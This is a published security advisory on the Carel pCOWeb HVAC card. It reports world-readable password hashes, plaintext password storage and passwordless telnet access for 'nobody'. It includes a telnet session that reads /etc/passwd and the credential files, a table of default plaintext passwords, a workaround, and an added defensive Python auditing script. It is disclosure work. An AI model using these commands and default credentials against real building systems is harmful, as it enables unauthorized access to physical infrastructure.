Unsafe Storage of Credentials in Carel pCOWeb HVAC
The Carel pCOWeb card stores password hashes in the file “/etc/passwd”, allowing privilege escalation by authenticated users. Additionally, plaintext copies of the passwords are stored.
Details
- Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
- Affected Versions: “A 1.4.11 - B 1.4.2”, possibly others
- Fixed Versions: product obsolete
- Vulnerability Type: Credential Disclosure / Privilege Escalation
- Security Risk: low
- Vendor URL:
https://www.carel.com/product/pcoweb-card
- Vendor Status: notified / product obsolete
- Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2019-013
- Advisory Status: published
- CVE: GENERIC-MAP-NOMATCH
- CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
“The pCOWeb card is used to interface the pCO Sistema to networks that use the HVAC protocols based on the Ethernet physical standard, such as BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated Web-Server, which both contains the HTML pages relating to the specific application and allows a browser to be used for remote system management.” (from the vendor’s homepage)
It is used as an OEM module in several different HVAC systems and considered obsolete by the vendor.
More Details
The Carel pCOWeb interface provides user accounts with different levels of privileges. Despite the different privileges, other users, even the user nobody, are able to read the file “/etc/passwd”, which contains the hashed passwords for all user accounts, including those with more privileges. Additionally, a plaintext copy of all passwords is stored in the file /usr/local/root/flash/etc/sysconfig/userspwd, which is accessible from the web interface at the URL
http://192.168.0.1/config/pw_changeusers.html
This allows attackers with knowledge of one user account's password to learn the other accounts' passwords, possibly gaining more privileges.
Proof of Concept
Apart from a web interface, the Carel pCOWeb card provides a telnet interface accessible using a variety of default passwords and, in some cases, the user “nobody” without password:
$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Linux 2.4.21-rmk1 (pCOWeb) (ttya0)
pCOWeb login: nobody
No directory /var/lib/nobody!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd
-rw-r--r-- 1 root root 317 Jan 1 00:00 /etc/passwd
[nobody@pCOWeb13:59:00 /]$ cat /etc/passwd
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash
[nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd
admin:7c3fxxrcHcwtc
[nobody@pCOWeb13:59:33 /]$
The following table lists the cleartext passwords for the above password hashes:
username  | password
----------+----------
root      | froot
httpadmin | fhttpadm
carel     | fcarel
guest     | fguest
nobody    | (none)
admin     | fadmin
The passwords for the user accounts “root”, “httpadmin”, “carel” and “guest” are documented in section 9.7.2 of the user manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0), warning users:
“it is important to set a password other than the default “froot” to prevent potentially dangerous outside access.”
It is possible that these default credentials are covered in CVE-2019-13553. Depending on firmware version and/or OEM modifications, some versions additionally allow Telnet login without password with the username “nobody” while it is disabled for other versions.
The password for the web interface user “admin” is documented in section 9.2.1 of the user manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0).
Additionally, some versions were seen with additional user credentials stored in the directory provided for OEM modifications of the web interface, such as the username “reserved” with the password “freserve” in “/usr/local/root/flash/http/reserved/.htpasswd”. Storing some of these passwords in plaintext is covered in CVE-2019-11369.
However, while the above passwords are stored in hashed form, the web interface at http://192.168.0.1/config/pw_changeusers.html shows them in plaintext. A file containing the plaintext passwords can be found in the filesystem:
[root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel
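As an added illustration that is not part of the original advisory, the following Python script shows how an auditor could check a copy of “/etc/passwd” and a userspwd-style file for the two weaknesses described above: accounts that log in without a password, accounts whose hash is exposed in the world-readable passwd file (the 13-character form seen here is the legacy DES crypt(3) scheme), and keys holding plaintext credentials. The sample input is constructed from the listings in this advisory, not read from a device.

```python
import re

# Constructed sample input modelled on the listings in this advisory (not read from a device).
SAMPLE_PASSWD = """\
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
shadowed:x:1000:1000:shadowed example:/home/shadowed:/bin/sh
"""
SAMPLE_USERSPWD = "PROOT=froot\nPHTTP=fhttpadmin\nPGUEST=fguest\nPCAREL=fcarel\n"

# Traditional DES crypt(3): 2-character salt plus 11 characters, 13 in total.
# It also silently ignores everything after the eighth character of the password.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
MODULAR_CRYPT = re.compile(r"^\$[0-9A-Za-z]+\$")  # $1$, $5$, $6$, $y$, ...

def classify(pw_field):
    """Classify the second field of a passwd(5) entry."""
    if pw_field == "":
        return "EMPTY"          # login is possible without any password
    if pw_field in ("x", "*", "!", "!!"):
        return "SHADOWED"       # hash lives in /etc/shadow, or the account is locked
    if DES_CRYPT.match(pw_field):
        return "DES_HASH"       # weak legacy hash exposed to every local user
    if MODULAR_CRYPT.match(pw_field):
        return "MODULAR_HASH"   # stronger hash, but still exposed in passwd
    return "UNKNOWN"

def audit_passwd(text):
    """Map account name -> classification for every well-formed passwd line."""
    result = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7:    # passwd(5) has exactly seven colon-separated fields
            result[fields[0]] = classify(fields[1])
    return result

def plaintext_entries(text):
    """Return KEY=VALUE pairs from a userspwd-style file whose value is non-empty."""
    return {k: v for k, _, v in (l.partition("=") for l in text.splitlines()) if k and v}

def findings(passwd_text, userspwd_text):
    """Summarise what an unprivileged reader of these two files would learn."""
    accounts = audit_passwd(passwd_text)
    return {
        "no_password": sorted(u for u, c in accounts.items() if c == "EMPTY"),
        "hash_exposed": sorted(u for u, c in accounts.items() if c.endswith("_HASH")),
        "plaintext_keys": sorted(plaintext_entries(userspwd_text)),
    }

if __name__ == "__main__":
    print(findings(SAMPLE_PASSWD, SAMPLE_USERSPWD))
```

On a hardened system every non-system account would classify as SHADOWED and the plaintext key list would be empty.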
Workaround
Change all default passwords listed above and ensure the user “nobody” is disabled or has a password set. The Carel pCOWeb card should not be connected to networks accessible by untrusted users (compare advisory rt-sa-2019-014 (https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt)).
Fix
No updated firmware will be published for pCOWeb Cards, as they are obsolete since Dec 2017. A successor hardware with current firmware is available for OEM integrators.
Security Risk
Attackers with knowledge of one set of user credentials to a Carel pCOWeb card could use the password hashes accessible to all users in “/etc/passwd” or the plaintext copies of the passwords to gain different privileges. Due to the necessity of access to credentials, this is considered to pose a low risk only.
Timeline
- 2019-07-17 Vulnerability identified
- 2019-08-03 Customer approved disclosure to vendor
- 2019-09-02 Vendor notified
- 2019-09-09 Vendor did not respond as promised
- 2019-09-17 Vendor could not be reached
- 2019-09-18 Vendor could not be reached
- 2019-09-18 Vendor could not be reached
- 2019-10-28 Advisory published due to publication of CVE-2019-13553
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/